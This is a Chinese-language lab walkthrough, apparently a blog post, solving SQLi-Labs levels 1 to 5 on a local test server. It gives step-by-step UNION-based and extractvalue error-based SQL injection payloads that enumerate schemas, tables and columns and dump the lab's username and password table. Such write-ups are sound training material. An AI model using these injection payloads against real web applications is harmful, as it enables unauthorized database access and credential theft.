SQLi-Labs靶场Less1-Less5关卡复现

原创 已于 2025-11-25 15:15:16 修改 · 1.7k 阅读 · 12 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#网络安全
于 2025-11-21 15:19:16 首次发布

Less1 - Error Based- String

①初始页面:存在"Please input the ID as parameter with numeric value"提示

URL:http://127.0.0.1:8080/Less-1/

②根据提示尝试构造?id=1,发现了id=1的用户名及其密码

payload:http://127.0.0.1:8080/Less-1/?id=1

③用单引号'测试注入点,存在报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

可以初步判断是字符型SQL注入漏洞

payload:http://127.0.0.1:8080/Less-1/?id=1'

④根据注入点的报错信息尝试闭合语句,最终闭合成功的语句为?id=1' -- s

payload:http://127.0.0.1:8080/Less-1/?id=1' -- s

⑤用order by判断注入点数量

payload:http://127.0.0.1:8080/Less-1/?id=1' order by 3 -- s

⑥通过注入点数量,查看是否存在回显点,查找到回显点2,3

payload:http://127.0.0.1:8080/Less-1/?id=-1' union select 1,2,3 -- s

⑦通过回显点爆数据库名

结果:information_schema,challenges,mysql,performance_schema,security

payload:http://127.0.0.1:8080/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata  -- s

⑧通过回显点爆security数据库下的表名

结果:emails,referers,uagents,users

payload:http://127.0.0.1:8080/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"  -- s

⑨通过回显点爆users表下的字段名

结果:id,username,password

payload:http://127.0.0.1:8080/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"  -- s

⑩通过回显点爆字段username,password内容

结果:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

payload:http://127.0.0.1:8080/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users  -- s

Less2 - Error Based- Intiger

①初始页面:存在"Please input the ID as parameter with numeric value"提示

URL:http://127.0.0.1:8080/Less-2

②根据提示尝试构造?id=1,发现了id=1的用户名及其密码

payload:http://127.0.0.1:8080/Less-2/?id=1

③用单引号'and 1=1和and1=2测试注入点,'和and 1=2存在报错信息

payload:http://127.0.0.1:8080/Less-2/?id=1 and 1=2

通过'存在报错且and 1=2无回显信息,可以初步判断是字符型SQL注入漏洞

④用order by判断注入点数量

payload:http://127.0.0.1:8080/Less-2/?id=1 order by 3

⑤通过注入点数量,查看是否存在回显点,查找到回显点2,3

payload:http://127.0.0.1:8080/Less-2/?id=-1 union select 1,2,3

⑥通过回显点爆数据库名

payload:http://127.0.0.1:8080/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

结果:information_schema,challenges,mysql,performance_schema,security

⑥通过回显点爆security数据库下的表名

payload:http://127.0.0.1:8080/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

结果:emails,referers,uagents,users

⑦通过回显点爆users下的字段名

payload:http://127.0.0.1:8080/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"

结果:id,username,password

⑧通过回显点爆字段username,password内容

payload:http://127.0.0.1:8080/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users

结果: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4 

Less3 - Error Based- String (with Twist)

①初始页面:存在"Please input the ID as parameter with numeric value "提示

URL:http://127.0.0.1:8080/Less-3

②尝试构造?id=1,发现了id=1的用户名及其密码

payload:http://127.0.0.1:8080/Less-3/?id=1

③用'测试注入点

显示报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

初步判断为字符型SQL注入

④根据注入点的报错信息尝试闭合语句,最终闭合成功的语句为?id=1') -- s

payload:http://127.0.0.1:8080/Less-3/?id=1') -- s

⑤用order by判断字段数量

payload:http://127.0.0.1:8080/Less-3/?id=1') order by 3 -- s

⑥判断回显点数量

payload:http://127.0.0.1:8080/Less-3/?id=-1') union select 1,2,3 -- s

⑦通过回显点爆数据库名

payload:http://127.0.0.1:8080/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata -- s

结果:information_schema,challenges,mysql,performance_schema,security

⑧通过回显点爆security库的表名

payload:http://127.0.0.1:8080/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- s

结果:emails,referers,uagents,users

⑨通过回显点爆usrs表的所有字段名

payload:http://127.0.0.1:8080/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- s

结果:id,username,password

⑩通过回显点查看username,password字段所有内容

payload:http://127.0.0.1:8080/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users -- s

结果:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Less4 - Error Based- DoubleQuotes String

①初始页面:存在"Please input the ID as parameter with numeric value "提示

URL:http://127.0.0.1:8080/Less-4/

②尝试构造?id=1,发现了id=1的用户名及其密码

payload:http://127.0.0.1:8080/Less-4/?id=1

③用双引号"测试注入点,存在报错信息

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

可以初步判断为字符型SQL注入

payload:http://127.0.0.1:8080/Less-4/?id=1"

④根据注入点的报错信息尝试闭合语句,最终闭合成功的语句为?id=1“) -- s

payload:http://127.0.0.1:8080/Less-4/?id=1") -- s

⑤用order by判断注入点数量

payload:http://127.0.0.1:8080/Less-4/?id=1") order by 3 -- s

⑥通过注入点数量,查看是否存在回显点,查找到回显点2,3

payload:http://127.0.0.1:8080/Less-4/?id=-1") union select 1,2,3 -- s

⑦通过回显点爆数据库名

payload:http://127.0.0.1:8080/Less-4/?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata  -- s

⑧通过回显点爆security数据库下的表名

payload:http://127.0.0.1:8080/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"  -- s

⑨通过回显点爆users表下的字段名

payload:http://127.0.0.1:8080/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users"  -- s

⑩通过回显点爆字段username,password内容

payload:http://127.0.0.1:8080/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users  -- s

Less5 - Double Query- Single Quotes- String

①初始页面:存在"Please input the ID as parameter with numeric value "提示

URL:http://127.0.0.1:8080/Less-5/

②尝试构造?id=1,发现只有"You are in..."

payload:http://127.0.0.1:8080/Less-5/?id=1

③尝试构造?id=1'

提示"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"信息,那么应该需要构造报错注入

payload:http://127.0.0.1:8080/Less-5/?id=1'

④构造报错注入爆数据库名

payload1:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(schema_name) from information_schema.schemata),1,30))) -- s

payload2:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(schema_name) from information_schema.schemata),31,30))) -- s

payload3:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(schema_name) from information_schema.schemata),61,30))) -- s

结果:information_schema,challenges,mysql,performance_schema,security

⑤构造报错注入爆security库下所有表名

payload:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(table_name) from information_schema.tables where table_schema="security"),1,30))) -- s

结果:emails,referers,uagents,users

⑥构造报错注入爆users表下的所有字段名

payload:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(column_name) from information_schema.columns where table_name="users"),1,30))) -- s

结果:id,username,password

⑦构造报错注入爆username、password字段下所有内容

payload1:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username) from users),1,30))) -- s

payload2:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username) from users),31,30))) -- s

payload3:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username) from users),61,30))) -- s

payload4:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(username) from users),91,30))) -- s

payload5:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(password) from users),1,30))) -- s

payload6:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(password) from users),31,30))) -- s

payload7:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(password) from users),61,30))) -- s

payload8:http://127.0.0.1:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,substring((select group_concat(password) from users),91,30))) -- s

结果:

username:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

PhPstudy及SQLi-Labs 靶场安装保姆级教程(附链接及常见问题解答)
born151212的博客
09-14 792
PHPStudy 是一款集成化的 PHP 开发环境工具,适用于 Windows 平台。它集成了 Apache、Nginx、MySQL、PHP 等组件,支持一键安装和配置,简化了本地开发环境的搭建流程。PHPStudy 主要用于 PHP 项目开发、调试及学习,尤其适合初学者快速部署环境。对于CTF学习者来说是运行靶场的常用环境。SQLi-Labs 是一个专门为学习 SQL 注入(SQL Injection)技术设计的开源实验平台。
渗透测试靶场sqli-labs安装
m0_54342116的博客
11-24 1235
渗透测试sql注入靶场sqli-labs)安装,以及每个关卡的通关方法
sqli-labs环境搭建及复现
m0_74344277的博客
09-06 1299
安装完后打开软件,开启nginx和mysql。
靶场到实战:用Kali Linux的sqlmap复现SQLi-Labs漏洞的完整心路历程
weixin_30644369的博客
05-04 597
本文详细记录了使用Kali Linux中的sqlmap工具复现SQLi-Labs漏洞的完整过程,从环境准备到实战操作,涵盖GET/POST/Cookie注入及盲注等高级技巧。通过具体案例解析和常见问题解决方案,帮助网络安全新手快速掌握SQL注入检测技术,并分享从靶场过渡到真实环境的实用建议。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
热门推荐
weixin_59086772的博客
10-18 1万+
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
无人机基于多 Dubins 路径段协同路径规划及粒子群优化的无人机在复杂威胁环境中的路径规划策略(Matlab实现)
06-21
【无人机】基于多 Dubins 路径段协同路径规划及粒子群优化的无人机在复杂威胁环境中的路径规划策略(Matlab实现)
小组作业(包含excel数据表、可视化视图)
最新发布
06-21
小组作业(包含excel数据表、可视化视图)
【水下机器人】6自由度欠驱动自主水下机器人的反馈线性化仿真研究(Matlab代码实现)
06-21
【水下机器人】6自由度欠驱动自主水下机器人的反馈线性化仿真研究(Matlab代码实现)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值